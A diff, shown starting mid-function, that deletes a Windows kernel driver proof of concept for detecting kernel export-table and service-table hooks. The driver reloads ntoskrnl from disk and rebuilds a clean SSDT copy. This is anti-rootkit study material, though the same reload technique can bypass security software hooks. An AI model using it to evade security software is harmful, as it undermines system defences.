FirstThunk=(PIMAGE_THUNK_DATA)(ImageBase+ImageImportDescriptor->FirstThunk);
while(ImageThunkData->u1.Ordinal)
{
//序号导入
if(IMAGE_SNAP_BY_ORDINAL32(ImageThunkData->u1.Ordinal))
{
//通过系统内核的导出表 名称- 获得 函数地址
FunctionAddress=(DWORD)MiFindExportedRoutine(ModuleBase,FALSE,NULL,ImageThunkData->u1.Ordinal & ~IMAGE_ORDINAL_FLAG32);
if (FunctionAddress==0)
{
return FALSE;
}
FirstThunk->u1.Function=FunctionAddress;
}
//函数名导入
else
{
//
ImortByName=(PIMAGE_IMPORT_BY_NAME)(ImageBase+ImageThunkData->u1.AddressOfData);
FunctionAddress=(DWORD)MiFindExportedRoutine(ModuleBase,TRUE,ImortByName->Name,0);
if (FunctionAddress==0)
{
return FALSE;
}
FirstThunk->u1.Function=FunctionAddress;
}
FirstThunk++;
ImageThunkData++;
}
ImageImportDescriptor++;
}
return TRUE;
}
/*
system32//NtosKrnl.exe ..
*/
BOOLEAN PeLoad(
WCHAR *FileFullPath,
BYTE **ImageModeleBase,
PDRIVER_OBJECT DeviceObject,
DWORD ExistImageBase
)
{
NTSTATUS Status;
HANDLE hFile;
LARGE_INTEGER FileSize;
DWORD Length;
BYTE *FileBuffer;
BYTE *ImageBase;
IO_STATUS_BLOCK IoStatus;
//\SystemRoot\system32\ntkrnlpa.exe
Status=KernelOpenFile(FileFullPath,&hFile,0x100020,0x80,1,1,0x20); //自己创建文件对象挂入FileObject->IrpList 并返回文件句柄
if (!NT_SUCCESS(Status))
{
return FALSE;
}
Status=KernelGetFileSize(hFile,&FileSize); //读取irp信息返回filesize
if (!NT_SUCCESS(Status))
{
ZwClose(hFile);
return FALSE;
}
Length=FileSize.LowPart;
FileBuffer=ExAllocatePool(PagedPool,Length);
if (FileBuffer==NULL)
{
ZwClose(hFile);
return FALSE;
}
Status=KernelReadFile(hFile,NULL,Length,FileBuffer,&IoStatus); //传入文件句柄、文件大小 通过irp请求读取文件到内存中
if (!NT_SUCCESS(Status))
{
ZwClose(hFile);
ExFreePool(FileBuffer);
return FALSE;
}
ZwClose(hFile);
if(!ImageFile(FileBuffer,&ImageBase)) //修复FileBuffer中的偏移 按照VirtualAglin 对齐 得到全局ImageModuleBase
{
ExFreePool(FileBuffer);
return FALSE;
}
ExFreePool(FileBuffer);
//2k3下MiFindExportedRoutine调用失败
if(!FixImportTable(ImageBase,ExistImageBase,DeviceObject)) //修复导入表
{
ExFreePool(ImageBase);
return FALSE;
}
if(!FixBaseRelocTable(ImageBase,ExistImageBase)) //修复重定位表
{
ExFreePool(ImageBase);
return FALSE;
}
*ImageModeleBase=ImageBase; //得到最后的基地址 就是 和 原来内存中格式一样的 一块ntos
return TRUE;
}

64
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/KernelReload.h
View File

@ -1,64 +0,0 @@
#include "Reload.h"
BOOLEAN GetSystemKernelModuleInfo(WCHAR **SystemKernelModulePath,PDWORD SystemKernelModuleBase,PDWORD SystemKernelModuleSize);
BOOLEAN IoGetFileSystemVpbInfo(IN PFILE_OBJECT FileObject,PDEVICE_OBJECT *DeviceObject,PDEVICE_OBJECT *RealDevice);
BOOLEAN GetDeviceObjectFromFileFullName(WCHAR *FileFullName,PDEVICE_OBJECT *RealDevice, PDEVICE_OBJECT *DeviceObject);
BOOLEAN GetWindowsRootName(WCHAR *WindowsRootName);
NTSTATUS KernelOpenFile(wchar_t *FileFullName,
PHANDLE FileHandle,
ACCESS_MASK DesiredAccess,
ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions);
NTSTATUS KernelGetFileSize(HANDLE hFile, PLARGE_INTEGER FileSize);
NTSTATUS KernelReadFile(HANDLE hFile, PLARGE_INTEGER ByteOffset, ULONG Length, PVOID FileBuffer, PIO_STATUS_BLOCK IoStatusBlock);
BOOLEAN ImageFile(BYTE *FileBuffer,BYTE **ImageModuleBase);
ULONG AlignSize(ULONG nSize, ULONG nAlign);
PVOID GetKernelModuleBase(PDRIVER_OBJECT DriverObject,char *KernelModuleName);
BOOLEAN InsertOriginalFirstThunk(DWORD ImageBase,DWORD ExistImageBase,PIMAGE_THUNK_DATA FirstThunk);
PVOID
MiFindExportedRoutine (
IN PVOID DllBase,
BOOLEAN ByName,
IN char *RoutineName,
DWORD Ordinal
);
BOOLEAN FixImportTable(BYTE *ImageBase,DWORD ExistImageBase,PDRIVER_OBJECT DriverObject);
BOOLEAN PeLoad(
WCHAR *FileFullPath,
BYTE **ImageModeleBase,
PDRIVER_OBJECT DeviceObject,
DWORD ExistImageBase
);

1
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/ReadMe.txt
View File

@ -1 +0,0 @@
Check Kernel EAT Hook

355
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/Reload.c
View File

@ -1,355 +0,0 @@
#include "Reload.h"
#include "KernelReload.h"
WCHAR* SystemKernelFilePath = NULL;
ULONG_PTR SystemKernelModuleBase = 0;
ULONG_PTR SystemKernelModuleSize = 0;
ULONG_PTR ImageModuleBase;
PVOID OriginalKiServiceTable;
extern PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;
PSERVICE_DESCRIPTOR_TABLE OriginalServiceDescriptorTable;
PSERVICE_DESCRIPTOR_TABLE Safe_ServiceDescriptorTable;
/*
FuncName Ntos地址 Ntos地址
//第一次都是通过 系统的原来偏移 + NewBase 获得函数地址
//然后通过自己的RMmGetSystemRoutineAddress获得 偏移+NewBase 获得函数地址
*/
ULONG ReLoadNtosCALL(WCHAR *lpwzFuncTion,ULONG ulOldNtosBase,ULONG ulReloadNtosBase)
{
UNICODE_STRING UnicodeFunctionName;
ULONG ulOldFunctionAddress;
PUCHAR ulReloadFunctionAddress = NULL;
int index=0;
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS NtDllHeader;
IMAGE_OPTIONAL_HEADER opthdr;
DWORD* arrayOfFunctionAddresses;
DWORD* arrayOfFunctionNames;
WORD* arrayOfFunctionOrdinals;
DWORD functionOrdinal;
DWORD Base, x, functionAddress,position;
char* functionName;
IMAGE_EXPORT_DIRECTORY *pExportTable;
ULONG ulNtDllModuleBase;
UNICODE_STRING UnicodeFunction;
UNICODE_STRING UnicodeExportTableFunction;
ANSI_STRING ExportTableFunction;
//第一次都是通过 系统的原来偏移 + NewBase 获得函数地址
//然后通过自己的RMmGetSystemRoutineAddress获得 偏移+NewBase 获得函数地址
__try
{
if (RRtlInitUnicodeString &&
RRtlCompareUnicodeString &&
RMmGetSystemRoutineAddress &&
RMmIsAddressValid)
{
RRtlInitUnicodeString(&UnicodeFunctionName,lpwzFuncTion);
ulOldFunctionAddress = (DWORD)RMmGetSystemRoutineAddress(&UnicodeFunctionName);
ulReloadFunctionAddress = (PUCHAR)(ulOldFunctionAddress - ulOldNtosBase + ulReloadNtosBase); //获得重载的FuncAddr
if (RMmIsAddressValid(ulReloadFunctionAddress)) //如果无效就从 导出表 获取? 应该不会无效
{
return (ULONG)ulReloadFunctionAddress;
}
//从导出表里获取
ulNtDllModuleBase = ulReloadNtosBase;
pDosHeader = (PIMAGE_DOS_HEADER)ulReloadNtosBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulNtDllModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulNtDllModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulNtDllModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)((BYTE*)ulNtDllModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
for(x = 0; x < pExportTable->NumberOfFunctions; x++) //在整个导出表里扫描
{
functionName = (char*)( (BYTE*)ulNtDllModuleBase + arrayOfFunctionNames[x]);
functionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1;
functionAddress = (DWORD)((BYTE*)ulNtDllModuleBase + arrayOfFunctionAddresses[functionOrdinal]);
RtlInitAnsiString(&ExportTableFunction,functionName);
RtlAnsiStringToUnicodeString(&UnicodeExportTableFunction,&ExportTableFunction,TRUE);
RRtlInitUnicodeString(&UnicodeFunction,lpwzFuncTion);
if (RRtlCompareUnicodeString(&UnicodeExportTableFunction,&UnicodeFunction,TRUE) == 0)
{
RtlFreeUnicodeString(&UnicodeExportTableFunction);
return functionAddress;
}
RtlFreeUnicodeString(&UnicodeExportTableFunction);
}
return 0;
}
RtlInitUnicodeString(&UnicodeFunctionName,lpwzFuncTion);
ulOldFunctionAddress = (DWORD)MmGetSystemRoutineAddress(&UnicodeFunctionName);
ulReloadFunctionAddress = (PUCHAR)(ulOldFunctionAddress - ulOldNtosBase + ulReloadNtosBase);
//KdPrint(("%ws:%08x:%08x",lpwzFuncTion,ulOldFunctionAddress,ulReloadFunctionAddress));
if (MmIsAddressValid(ulReloadFunctionAddress))
{
return (ULONG)ulReloadFunctionAddress;
}
//
}__except(EXCEPTION_EXECUTE_HANDLER){
KdPrint(("EXCEPTION_EXECUTE_HANDLER"));
}
return 0;
}
/*重载Ntos*/
NTSTATUS ReLoadNtos(PDRIVER_OBJECT DriverObject,DWORD RetAddress)
{
NTSTATUS status = STATUS_UNSUCCESSFUL;
ULONG ulKeAddSystemServiceTable;
PULONG p;
if (!GetSystemKernelModuleInfo(
&SystemKernelFilePath,
&SystemKernelModuleBase,
&SystemKernelModuleSize
))
{
KdPrint(("Get System Kernel Module failed"));
return status;
}
if (InitSafeOperationModule(
DriverObject,
SystemKernelFilePath,
SystemKernelModuleBase
))
{
KdPrint(("Init Ntos module success\r\n"));
RRtlInitUnicodeString = NULL;
RMmGetSystemRoutineAddress = NULL;
RMmIsAddressValid = NULL;
RRtlCompareUnicodeString = NULL;
RPsGetCurrentProcess = NULL;
status = STATUS_UNSUCCESSFUL;
//第一次都是通过 系统的原来偏移 + NewBase 获得函数地址
//然后通过自己的RMmGetSystemRoutineAddress获得 偏移+NewBase 获得函数地址
RRtlInitUnicodeString = (ReloadRtlInitUnicodeString)ReLoadNtosCALL(L"RtlInitUnicodeString",SystemKernelModuleBase,ImageModuleBase);
RRtlCompareUnicodeString = (ReloadRtlCompareUnicodeString)ReLoadNtosCALL(L"RtlCompareUnicodeString",SystemKernelModuleBase,ImageModuleBase);
RMmGetSystemRoutineAddress = (ReloadMmGetSystemRoutineAddress)ReLoadNtosCALL(L"MmGetSystemRoutineAddress",SystemKernelModuleBase,ImageModuleBase);
RMmIsAddressValid = (ReloadMmIsAddressValid)ReLoadNtosCALL(L"MmIsAddressValid",SystemKernelModuleBase,ImageModuleBase);
RPsGetCurrentProcess = (ReloadPsGetCurrentProcess)ReLoadNtosCALL(L"PsGetCurrentProcess",SystemKernelModuleBase,ImageModuleBase);
if (!RRtlInitUnicodeString ||
!RRtlCompareUnicodeString ||
!RMmGetSystemRoutineAddress ||
!RMmIsAddressValid ||
!RPsGetCurrentProcess)
{
KdPrint(("Init NtosCALL failed"));
return status;
}
}
return status;
}
BOOLEAN InitSafeOperationModule(PDRIVER_OBJECT pDriverObject,WCHAR *SystemModulePath,ULONG KernelModuleBase)
{
UNICODE_STRING FileName;
HANDLE hSection;
PDWORD FixdOriginalKiServiceTable;
PDWORD CsRootkitOriginalKiServiceTable;
ULONG i = 0;
//自己peload 一个ntos*,这样就解决了跟其他安全软件的冲突啦~
if (!PeLoad(SystemModulePath,(BYTE**)&ImageModuleBase,pDriverObject,KernelModuleBase))
{
return FALSE;
}
OriginalKiServiceTable = ExAllocatePool(NonPagedPool,KeServiceDescriptorTable->TableSize*sizeof(DWORD));
if (!OriginalKiServiceTable)
{
return FALSE;
}
//获得SSDT基址通过重定位表比较得到
if(!GetOriginalKiServiceTable((BYTE*)ImageModuleBase,KernelModuleBase,(DWORD*)&OriginalKiServiceTable))
{
ExFreePool(OriginalKiServiceTable);
return FALSE;
}
//修复SSDT函数地址 都是自己Reload的函数地址 干净的
FixOriginalKiServiceTable((PDWORD)OriginalKiServiceTable,(DWORD)ImageModuleBase,KernelModuleBase);
OriginalServiceDescriptorTable = (PSERVICE_DESCRIPTOR_TABLE)ExAllocatePool(NonPagedPool,sizeof(SERVICE_DESCRIPTOR_TABLE)*4);
if (OriginalServiceDescriptorTable == NULL)
{
ExFreePool(OriginalKiServiceTable);
return FALSE;
}
RtlZeroMemory(OriginalServiceDescriptorTable,sizeof(SERVICE_DESCRIPTOR_TABLE)*4);
//修复SERVICE_DESCRIPTOR_TABLE 结构
OriginalServiceDescriptorTable->ServiceTable = (PDWORD)OriginalKiServiceTable;
OriginalServiceDescriptorTable->CounterTable = KeServiceDescriptorTable->CounterTable;
OriginalServiceDescriptorTable->TableSize = KeServiceDescriptorTable->TableSize;
OriginalServiceDescriptorTable->ArgumentTable = KeServiceDescriptorTable->ArgumentTable;
CsRootkitOriginalKiServiceTable = (PDWORD)ExAllocatePool(NonPagedPool,KeServiceDescriptorTable->TableSize*sizeof(DWORD));
if (CsRootkitOriginalKiServiceTable==NULL)
{
ExFreePool(OriginalServiceDescriptorTable);
ExFreePool(OriginalKiServiceTable);
return FALSE;
}
RtlZeroMemory(CsRootkitOriginalKiServiceTable,KeServiceDescriptorTable->TableSize*sizeof(DWORD));
Safe_ServiceDescriptorTable = (PSERVICE_DESCRIPTOR_TABLE)ExAllocatePool(NonPagedPool,sizeof(SERVICE_DESCRIPTOR_TABLE)*4);
if (Safe_ServiceDescriptorTable == NULL)
{
ExFreePool(OriginalServiceDescriptorTable);
ExFreePool(CsRootkitOriginalKiServiceTable);
ExFreePool(OriginalKiServiceTable);
return FALSE;
}
//这是一个干净的原始表每个表里所对应的SSDT函数的地址都是原始函数
RtlZeroMemory(Safe_ServiceDescriptorTable,sizeof(SERVICE_DESCRIPTOR_TABLE)*4);
//填充原始函数地址
for (i = 0; i < KeServiceDescriptorTable->TableSize; i++)
{
CsRootkitOriginalKiServiceTable[i] = OriginalServiceDescriptorTable->ServiceTable[i];
}
Safe_ServiceDescriptorTable->ServiceTable = (PDWORD)CsRootkitOriginalKiServiceTable;
Safe_ServiceDescriptorTable->CounterTable = KeServiceDescriptorTable->CounterTable;
Safe_ServiceDescriptorTable->TableSize = KeServiceDescriptorTable->TableSize;
Safe_ServiceDescriptorTable->ArgumentTable = KeServiceDescriptorTable->ArgumentTable;
//释放就会bsod
//ExFreePool(OriginalKiServiceTable);
return TRUE;
}
VOID FixOriginalKiServiceTable(PDWORD OriginalKiServiceTable,DWORD ModuleBase,DWORD ExistImageBase)
{
DWORD FuctionCount;
DWORD Index;
FuctionCount=KeServiceDescriptorTable->TableSize; //函数个数
KdPrint(("ssdt funcion count:%X---KiServiceTable:%X\n",FuctionCount,KeServiceDescriptorTable->ServiceTable));
for (Index=0;Index<FuctionCount;Index++)
{
OriginalKiServiceTable[Index]=OriginalKiServiceTable[Index]-ExistImageBase+ModuleBase; //修复SSDT函数地址
}
}
//通过KeServiceDescriptorTable的RVA与重定位表项解析的地址RVA比较一致则取出其中的SSDT表地址
BOOLEAN GetOriginalKiServiceTable(BYTE *NewImageBase,DWORD ExistImageBase,DWORD *NewKiServiceTable)
{
PIMAGE_DOS_HEADER ImageDosHeader;
PIMAGE_NT_HEADERS ImageNtHeaders;
DWORD KeServiceDescriptorTableRva;
PIMAGE_BASE_RELOCATION ImageBaseReloc=NULL;
DWORD RelocSize;
int ItemCount,Index;
int Type;
PDWORD RelocAddress;
DWORD RvaData;
DWORD count=0;
WORD *TypeOffset;
ImageDosHeader=(PIMAGE_DOS_HEADER)NewImageBase;
if (ImageDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
return FALSE;
}
ImageNtHeaders=(PIMAGE_NT_HEADERS)(NewImageBase+ImageDosHeader->e_lfanew);
if (ImageNtHeaders->Signature!=IMAGE_NT_SIGNATURE)
{
return FALSE;
}
KeServiceDescriptorTableRva=(DWORD)MiFindExportedRoutine(NewImageBase,TRUE,"KeServiceDescriptorTable",0);
if (KeServiceDescriptorTableRva==0)
{
return FALSE;
}
KeServiceDescriptorTableRva=KeServiceDescriptorTableRva-(DWORD)NewImageBase;
ImageBaseReloc=RtlImageDirectoryEntryToData(NewImageBase,TRUE,IMAGE_DIRECTORY_ENTRY_BASERELOC,&RelocSize);
if (ImageBaseReloc==NULL)
{
return FALSE;
}
while (ImageBaseReloc->SizeOfBlock)
{
count++;
ItemCount=(ImageBaseReloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION))/2;
TypeOffset=(WORD*)((DWORD)ImageBaseReloc+sizeof(IMAGE_BASE_RELOCATION));
for (Index=0;Index<ItemCount;Index++)
{
Type=TypeOffset[Index]>>12; //高4位是类型 低12位位页内偏移 4k
if (Type==3)
{
//Base + Virtual 定位到页 + 低12位 = RelocAddress 需要修复的地址
RelocAddress=(PDWORD)((DWORD)(TypeOffset[Index]&0x0fff)+ImageBaseReloc->VirtualAddress+(DWORD)NewImageBase);
RvaData=*RelocAddress-ExistImageBase;
if (RvaData==KeServiceDescriptorTableRva) //重定位表中的rva 是 KeServiceDescriptorTable 表项的
{
if(*(USHORT*)((DWORD)RelocAddress-2)==0x05c7)
{
/*
1: kd> dd 0x89651c12 RelocAddress - 2
89651c12 79c005c7 bd9c83f8
1: kd> dd KeServiceDescriptorTable
83f879c0 83e9bd9c 00000000 00000191 83e9c3e4
83f879d0 00000000 00000000 00000000 00000000
1: kd> dd 0x89651c14 RelocAddress
89651c14 83f879c0 83e9bd9c 79c41589 c8a383f8
89651c24 c783f879 f879cc05 e9c3e483 d8158983
*/
//RelocAddress 里面存放着 KeServiceDesriptorTable地址
//RelocAddress + 4 存放着 KeServiceDesriptorTable第一成员也就是SSDT基址
*NewKiServiceTable=*(DWORD*)((DWORD)RelocAddress+4)-ExistImageBase+(DWORD)NewImageBase;
return TRUE;
}
}
}
}
ImageBaseReloc=(PIMAGE_BASE_RELOCATION)((DWORD)ImageBaseReloc+ImageBaseReloc->SizeOfBlock);
}
return FALSE;
}

242
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/Reload.h
View File

@ -1,242 +0,0 @@
#include "DriverEntry.h"
#include <ntimage.h>
#pragma once
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned char BYTE, *PBYTE;
typedef unsigned short WORD, *PWORD;
typedef struct _SYSTEM_MODULE_INFORMATION // 系统模块信息
{
ULONG Reserved[2];
ULONG Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef struct _tagSysModuleList { //模块链结构
ULONG ulCount;
SYSTEM_MODULE_INFORMATION smi[1];
} MODULES, *PMODULES;
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation, // 0 Y N
SystemProcessorInformation, // 1 Y N
SystemPerformanceInformation, // 2 Y N
SystemTimeOfDayInformation, // 3 Y N
SystemNotImplemented1, // 4 Y N
SystemProcessesAndThreadsInformation, // 5 Y N
SystemCallCounts, // 6 Y N
SystemConfigurationInformation, // 7 Y N
SystemProcessorTimes, // 8 Y N
SystemGlobalFlag, // 9 Y Y
SystemNotImplemented2, // 10 Y N
SystemModuleInformation, // 11 Y N
SystemLockInformation, // 12 Y N
SystemNotImplemented3, // 13 Y N
SystemNotImplemented4, // 14 Y N
SystemNotImplemented5, // 15 Y N
SystemHandleInformation, // 16 Y N
SystemObjectInformation, // 17 Y N
SystemPagefileInformation, // 18 Y N
SystemInstructionEmulationCounts, // 19 Y N
SystemInvalidInfoClass1, // 20
SystemCacheInformation, // 21 Y Y
SystemPoolTagInformation, // 22 Y N
SystemProcessorStatistics, // 23 Y N
SystemDpcInformation, // 24 Y Y
SystemNotImplemented6, // 25 Y N
SystemLoadImage, // 26 N Y
SystemUnloadImage, // 27 N Y
SystemTimeAdjustment, // 28 Y Y
SystemNotImplemented7, // 29 Y N
SystemNotImplemented8, // 30 Y N
SystemNotImplemented9, // 31 Y N
SystemCrashDumpInformation, // 32 Y N
SystemExceptionInformation, // 33 Y N
SystemCrashDumpStateInformation, // 34 Y Y/N
SystemKernelDebuggerInformation, // 35 Y N
SystemContextSwitchInformation, // 36 Y N
SystemRegistryQuotaInformation, // 37 Y Y
SystemLoadAndCallImage, // 38 N Y
SystemPrioritySeparation, // 39 N Y
SystemNotImplemented10, // 40 Y N
SystemNotImplemented11, // 41 Y N
SystemInvalidInfoClass2, // 42
SystemInvalidInfoClass3, // 43
SystemTimeZoneInformation, // 44 Y N
SystemLookasideInformation, // 45 Y N
SystemSetTimeSlipEvent, // 46 N Y
SystemCreateSession, // 47 N Y
SystemDeleteSession, // 48 N Y
SystemInvalidInfoClass4, // 49
SystemRangeStartInformation, // 50 Y N
SystemVerifierInformation, // 51 Y Y
SystemAddVerifier, // 52 N Y
SystemSessionProcessesInformation // 53 Y N
} SYSTEM_INFORMATION_CLASS;
#define LDRP_RELOCATION_FINAL 0x2
#define RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK (0x00000001)
typedef struct _AUX_ACCESS_DATA {
PPRIVILEGE_SET PrivilegesUsed;
GENERIC_MAPPING GenericMapping;
ACCESS_MASK AccessesToAudit;
ACCESS_MASK MaximumAuditMask;
ULONG Unknown[41];
} AUX_ACCESS_DATA, *PAUX_ACCESS_DATA;
typedef struct _LDR_DATA_TABLE_ENTRY
{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
union
{
LIST_ENTRY HashLinks;
struct
{
PVOID SectionPointer;
ULONG CheckSum;
};
};
union
{
ULONG TimeDateStamp;
PVOID LoadedImports;
};
PVOID EntryPointActivationContext;
PVOID PatchInformation;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// typedef struct _IMAGE_BASE_RELOCATION {
// DWORD VirtualAddress;
// DWORD SizeOfBlock;
// // WORD TypeOffset[1];
// } IMAGE_BASE_RELOCATION,*PIMAGE_BASE_RELOCATION;
// typedef IMAGE_BASE_RELOCATION UNALIGNED * PIMAGE_BASE_RELOCATION;
typedef struct _SERVICE_DESCRIPTOR_TABLE {
/*
* Table containing cServices elements of pointers to service handler
* functions, indexed by service ID.
*/
PDWORD ServiceTable;
/*
* Table that counts how many times each service is used. This table
* is only updated in checked builds.
*/
PULONG CounterTable;
/*
* Number of services contained in this table.
*/
ULONG TableSize;
/*
* Table containing the number of bytes of parameters the handler
* function takes.
*/
PUCHAR ArgumentTable;
} SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE;
NTSTATUS ReLoadNtos(PDRIVER_OBJECT DriverObject,DWORD RetAddress);
NTSTATUS
NTAPI
ZwQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInfoClass,
OUT PVOID SystemInfoBuffer,
IN ULONG SystemInfoBufferSize,
OUT PULONG BytesReturned OPTIONAL
);
NTSTATUS
NTAPI
ObCreateObject (
IN KPROCESSOR_MODE ObjectAttributesAccessMode OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
IN ULONG ObjectSize,
IN ULONG PagedPoolCharge OPTIONAL,
IN ULONG NonPagedPoolCharge OPTIONAL,
OUT PVOID *Object
);
NTSTATUS
NTAPI
SeCreateAccessState(
PACCESS_STATE AccessState,
PAUX_ACCESS_DATA AuxData,
ACCESS_MASK Access,
PGENERIC_MAPPING GenericMapping
);
NTSYSAPI
PVOID
NTAPI
RtlImageDirectoryEntryToData (
IN PVOID Base,
IN BOOLEAN MappedAsImage,
IN USHORT DirectoryEntry,
OUT PULONG Size
);
BOOLEAN InitSafeOperationModule(PDRIVER_OBJECT pDriverObject,WCHAR *SystemModulePath,ULONG KernelModuleBase);
typedef VOID (__stdcall *ReloadRtlInitUnicodeString)(
__inout PUNICODE_STRING DestinationString,
__in_opt PCWSTR SourceString
);
ReloadRtlInitUnicodeString RRtlInitUnicodeString;
typedef LONG (__stdcall * ReloadRtlCompareUnicodeString)(
__in PCUNICODE_STRING String1,
__in PCUNICODE_STRING String2,
__in BOOLEAN CaseInSensitive
);
ReloadRtlCompareUnicodeString RRtlCompareUnicodeString;
typedef PVOID (__stdcall *ReloadMmGetSystemRoutineAddress)(
__in PUNICODE_STRING SystemRoutineName
);
ReloadMmGetSystemRoutineAddress RMmGetSystemRoutineAddress;
typedef BOOLEAN (__stdcall * ReloadMmIsAddressValid)(
__in PVOID VirtualAddress
);
ReloadMmIsAddressValid RMmIsAddressValid;
typedef PEPROCESS (__stdcall *ReloadPsGetCurrentProcess)(void);
ReloadPsGetCurrentProcess RPsGetCurrentProcess;
BOOLEAN GetOriginalKiServiceTable(BYTE *NewImageBase,DWORD ExistImageBase,DWORD *NewKiServiceTable);
VOID FixOriginalKiServiceTable(PDWORD OriginalKiServiceTable,DWORD ModuleBase,DWORD ExistImageBase);

1127
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/libdasm.c
View File

File diff suppressed because it is too large Load Diff

515
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/libdasm.h
View File

@ -1,515 +0,0 @@
/*
* libdasm -- simple x86 disassembly library
* (c) 2004 - 2005 jt / nologin.org
*
*/
#ifndef _LIBDASM_H
#define _LIBDASM_H
#ifdef __cplusplus
extern "C" {
#endif
#define __LIBDASM_VERSION__ 0x01020000
#define GET_VERSION_MAJOR \
(__LIBDASM_VERSION__ & 0xff000000) >> 24
#define GET_VERSION_MINOR1 \
(__LIBDASM_VERSION__ & 0x00ff0000) >> 16
#define GET_VERSION_MINOR2 \
(__LIBDASM_VERSION__ & 0x0000ff00) >> 8
#define GET_VERSION_MINOR3 \
(__LIBDASM_VERSION__ & 0x000000ff)
// Data types
#if _WIN32
//#include <windows.h>
#define __inline__ __inline
#define snprintf _snprintf
typedef unsigned __int64 QWORD; // for MSVC
typedef signed __int8 SBYTE;
typedef signed __int16 SWORD;
typedef signed __int32 SDWORD;
typedef signed __int64 SQWORD;
#else
#if defined __sun
#define BYTE_ORDER 1234
#define BIG_ENDIAN 1234
#define LITTLE_ENDIAN 4321
#define u_int8_t uint8_t
#define u_int16_t uint16_t
#define u_int32_t uint32_t
#define u_int64_t uint64_t
#endif // other *nix
#include <sys/types.h>
typedef u_int8_t BYTE;
typedef u_int16_t WORD;
typedef u_int32_t DWORD;
typedef u_int64_t QWORD;
typedef int8_t SBYTE;
typedef int16_t SWORD;
typedef int32_t SDWORD;
typedef int64_t SQWORD;
#endif
// Define endianess
#ifndef __X86__
// These should catch x86 with most compilers
#if defined _X86_ || defined _i386_ || defined __i386__
#define __X86__
#endif
#endif
#ifndef __LITTLE_ENDIAN__
// These should catch little-endian with most compilers
#if (BYTE_ORDER == LITTLE_ENDIAN) || defined __X86__ || defined _ALPHA_
#define __LITTLE_ENDIAN__
#endif
#endif
typedef unsigned long DWORD;
typedef unsigned long *PDWORD;
typedef unsigned short WORD;
typedef unsigned char BYTE;
typedef unsigned char *PBYTE;
//typedef unsigned short HMODULE;
// Registers
#define REGISTER_EAX 0
#define REGISTER_ECX 1
#define REGISTER_EDX 2
#define REGISTER_EBX 3
#define REGISTER_ESP 4
#define REGISTER_EBP 5
#define REGISTER_ESI 6
#define REGISTER_EDI 7
#define REGISTER_NOP 10 // no register defined
// Registers
#define MASK_REG(x) ((x) & 0x000000FF)
#define REG_EAX REGISTER_EAX
#define REG_AX REG_EAX
#define REG_AL REG_EAX
#define REG_ES REG_EAX // Just for reg_table consistence
#define REG_ST0 REG_EAX // Just for reg_table consistence
#define REG_ECX REGISTER_ECX
#define REG_CX REG_ECX
#define REG_CL REG_ECX
#define REG_CS REG_ECX
#define REG_ST1 REG_ECX
#define REG_EDX REGISTER_EDX
#define REG_DX REG_EDX
#define REG_DL REG_EDX
#define REG_SS REG_EDX
#define REG_ST2 REG_EDX
#define REG_EBX REGISTER_EBX
#define REG_BX REG_EBX
#define REG_BL REG_EBX
#define REG_DS REG_EBX
#define REG_ST3 REG_EBX
#define REG_ESP REGISTER_ESP
#define REG_SP REG_ESP
#define REG_AH REG_ESP // Just for reg_table consistence
#define REG_FS REG_ESP
#define REG_ST4 REG_ESP
#define REG_EBP REGISTER_EBP
#define REG_BP REG_EBP
#define REG_CH REG_EBP
#define REG_GS REG_EBP
#define REG_ST5 REG_EBP
#define REG_ESI REGISTER_ESI
#define REG_SI REG_ESI
#define REG_DH REG_ESI
#define REG_ST6 REG_ESI
#define REG_EDI REGISTER_EDI
#define REG_DI REG_EDI
#define REG_BH REG_EDI
#define REG_ST7 REG_EDI
#define REG_NOP REGISTER_NOP
// Register types
